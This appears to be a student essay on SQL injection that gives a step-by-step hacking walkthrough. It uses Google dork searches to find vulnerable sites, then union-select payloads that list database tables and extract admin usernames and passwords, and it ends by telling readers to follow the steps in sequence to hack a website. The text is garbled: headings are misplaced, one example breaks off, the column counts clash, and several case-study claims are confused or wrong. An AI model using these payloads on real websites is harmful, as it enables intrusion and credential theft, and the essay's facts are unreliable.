SQL Injection Attack: Detection And Prevention Techniques

Understanding SQL Injection Attack

Discuss about the SQL Injection and how it operates on the real world.

The injection attack, generally takes place when the attacker executes harmful SQL codes usually known as malicious payload is known as SQL Injection (Pawar, 2015). The SQL Injection helps to control the database server of web application known as RDBMS (Relational Database Management System). The vulnerability of SQL Injection generally affects the web application or the website and make use of the database that is SQL-based. The vulnerability done by SQL Injection is one of the most oldest method, and is considered as the most dangerous attacks in the history of vulnerabilities of web application (Agrawal & Singh, 2017). With an advanced SQL Injection vulnerability, and with right circumstances, the main motive of the attacker is to bypass the authentication of web application as well as authorization of the mechanism and then retrieve the whole content of the database.

Figure 1: Flowchart for a SQL Injection Attacks

The first step is to find the venerable website. Google Dork list is widely used tool for the hackers to find the venerable website (Pawar, 2015). There are various tricks to find the list, but “inurl:” command very popular way to find the list.

Some Examples:

• inurl:index.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=
• inurl:article.php?id=

The trick is to copy one of the above commands in the search bar and search for the result. The results include a lot of websites that has vulnerability in terms of design and security.

Once a vulnerability website is chosen from the list , the next step is to check and find the vulnerability itself which can be done by including a single quote at the end of the URL of the website like:

https://:www.abcd.com inurl:index.php?id=2’

 In case the website remains in the same page or show some error message like page is not found, then the website is not vulnerable(Agrawal & Singh, 2017).

The number of the column of the database can be checked by adding the“order by n” statement at the end of the URL by replacing the single quote.  . In case the value of n exceeds the actual number of columns, then an error message will be shown like(Geneiatakis, 2015):

“https://www.abcd.com/index.php?id=2 order by 8(error)”

The value for which the error message is shown, the number of columns is one less than that number. In this example the number of columns is 7.

In case the above method does not work then the alternative method is to add “-” at the end of the URL, for example:

Methods to Detect SQL Injection Attack

“https://www.abcd.com/index.php?id=2 order by 1- -”

With the help of the  “union select columns sequence”  the vulnerable part of the table can be found. The “order by n” command must be changed with this statement. The command  for 8 no of columns is as follows:

https://www.abcd.com/index.php?id= -2 union select 1,2,3,4,5,6,7, 8- –

https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7, 8- –

the result will show some number in the search page like 1, 2, 3,4, 5 and from the number one number has to be chosen like in this case number 2 is chosen for the example. The number is necessary to proceed further with the method(Alwan & Younis, 2017).

Now the number 2 has to be replaced with the command “version()” like the following

https://www.abcd.com/index.php?id=-2 and 1=2 union select 1, version(),3 ,4,5,6,7- – and  some version number will  like 4.0.2 or 5.3 or something like that  will be shown.

Now the version() command needs to be replaced with “database()” and “user()” to find information about the database and user respectively like:

“https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,database(),4,5,6,7- -”

https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,user(),3, 4,5,6,7- -”

In order to find the table name the number chosen in step 4 need to be replaced with the command “group_concat(table_name)”  and “from information_schema.tables”,where “table_schema=database()” command needs to be added additionally(Som, Sinha & Kataria, 2016):

“https://www.abcd.com/index.php?id=-2 and 1=2 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()- -”

It will show a lot of table names and from that the table related to the admin or user needs to be selected.

Now “group_concat(table_name)” has to be replaced with the “group_concat(column_name)” command. It will show the list of columns like “admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ? s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password”.

Now the “group_concat(column_name)” command should be replaced  with the command“group_concat(columnname,0x3a,anothercolumnname)”.Column name needs replacement from  column name listed above. . The command “anothercolumnname” should be replaced with the column name as well with column name listed:

With the help of this method the user name and password can be found as well. In order to obtain that the username and password column name needs to be used.

In order to hack a website and obtain information about the data base these steps need to be followed properly and the steps has to be performed in the proper sequence as mentioned.

Fig2: Work flow diagram of SQL injection to database

An example of the e-commerce search form is taken into account. A user has the right to ask site return list of the Samsung TV that were sold at some particular price (Geneiatakis, 2015). Second attack that took place with SQL Injections occurred in 2011. The SQL attack occured with the hack of the security firm HB Gary Federal, allowed all the Anonymous members to steal the passwords of the company (Sonoda, Matsuda & Koizumi, 2016). Third attack for SQL Injections occurred in a Chinese company of toy known as VTE. Almost about data of 4.8 million parents including 200,000 children’s data were stolen from the database of the company. The method that was used to hack the data of VTE was similar to the hacking method of Albert Gonzalez that was used to hack the Hannaford Brothers, 7-Eleven and many others to steal the credit card numbers and the debit card numbers of the users (Pawar, 2015). 

Techniques to Prevent SQL Injection Attack

Another attack that took place with the SQL Injections was in Mossack Fonseca, the Panamanian Law firm. This company was the source of Panama Projects, which has leaked the papers by an SQL Injection vulnerable in the company (Geneiatakis, 2015).

Figure 2: Industries that are Targeted by SQL Injections

(Source: Geneiatakis, 2015)

In the above figure, different kinds of industries affected by the SQL Injections attacks have been shown. It can be observed that the financial organizations are mostly affected by this attack.

The selected CVE for this paper is CVE-2010-2672 (CVE -CVE-2010-2672, 2018). This CVE is Multiple SQL injection vulnerabilities, which allows remote attackers to execute arbitrary SQL commands via the (1) SectionID and (2) SearchTimestamp parameters to the search feature and the (3) SearchContentClassAttributeID parameter to the advancedsearch feature (Naderi-Afooshteh et al., 2015).The real life example of SQL injection attack using this CVE was Sebastian, which is a service provider for phone, TV, and Internet in California.

1. The outcome of the attack was almost 100,000 $ was stolen from the accounts of the customers online whose account details were taken from database of the company. Group of hackers, who was known to be TeamBerserk held the attack for the company stealing almost all the credentials from Sebastian (Hilbrich, Frank & Lehrig, 2016). The attackers has copied all the credentials of the database account of Sebastian into their Gmail and got hold of their data. The data that were stolen were the email ids of the customer, passwords, phone number, and even credit card numbers from the database. The attackers, TeamBerserk twitted on Twitter that they have performed a SQL Injection attacking the passwords and the usernames of the customers in Sebastian. After the data breach, the hackers tweeted a 20-minute video representation that archives the attack (Steimle et al., 2015). The attackers also took the list of usernames and the passwords of the customers who uses different passwords for all the websites.
2. The impact of the attack that took place in Sebastian is that the customers lost almost about 100,000 $ from the accounts numbers that were taken from the database of the company. The names of the victim were such from the data that were breached, and if the data was found, the bank details and the other credentials were taken getting some amount of money from the account.

1. The aim of security that was breached was to steal the credential of all the customers involved in Sebastian Company (Hochreiner et al., 2014). The mission of the company was to provide security to all the customers who were involved with them and protect their credentials from all the cyber risks. The main aim of the security was to take all the bank account details of the customers to gain the amount of money from the customers. Almost about 100,000 $ was stolen from the customers which lead to great loss of the company.
2. The specific actions that should have taken by the vendor of Sebastian to stop the attack are to mitigate the further attacks that will take place in future (Alwan& Younis, 2017). To protect the sensitive data should be the highest priority and should be served as the priority. They should implement the checklist audit process or some vulnerable scan in the company. The vendor of Sebastian should implement a defensive approach to the cyber-threat that come to the company.

References

Agrawal, S., & Singh, U. (2017). Prevention of sql injection attack in web application with host language.

Alwan, Z. S., & Younis, M. F. (2017). Detection and Prevention of SQL Injection Attack: A Survey.

CVE -CVE-2010-2672. (2018). Cve.mitre.org. Retrieved 10 April 2018, from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2672

Geneiatakis, D. (2015, December). Minimizing databases attack surface against SQL injection attacks. In International Conference on Information and Communications Security (pp. 1-9). Springer, Cham.

Hilbrich, M., Frank, M., & Lehrig, S. (2016). Security Modeling with Palladio—Different Approaches. In Proceedings of the Symposium on Software Performance (pp. 7-9).

Hochreiner, C., Ma, Z., Kieseberg, P., Schrittwieser, S., & Weippl, E. (2014, April). Using model driven security approaches in web application development. In Information and Communication Technology-EurAsia Conference (pp. 419-431). Springer, Berlin, Heidelberg.

Naderi-Afooshteh, A., Nguyen-Tuong, A., Bagheri-Marzijarani, M., Hiser, J. D., & Davidson, J. W. (2015, June). Joza: Hybrid taint inference for defeating web application sql injection attacks. In Dependable Systems and Networks (DSN), 2015 45th Annual IEEE/IFIP International Conference on (pp. 172-183). IEEE.

Pawar, R. G. (2015). SQL Injection Attacks. KHOJ: Journal of Indian Management Research and Practices, 125-129.

Som, S., Sinha, S., & Kataria, R. (2016). Study on sql injection attacks: Mode detection and prevention. International Journal of Engineering Applied Sciences and Technology, Indexed in Google Scholar, ISI etc., Impact Factor: 1.494, 1(8), 23-29.

Sonoda, M., Matsuda, T., & Koizumi, D. (2016, October). On the approximate maximum likelihood estimation in stochastic model of SQL injection attacks. In Systems, Man, and Cybernetics (SMC), 2016 IEEE International Conference on(pp. 000802-000807). IEEE.

Steimle, F., Wieland, M., Mitschang, B., Wagner, S., & Leymann, F. (2015). Design and implementation issues of a secure cloud-based health data management system. In Proceedings of the 9th Symposium and Summer School On Service-Oriented Computing. Technical Paper, vol. RC25564(pp. 68-82).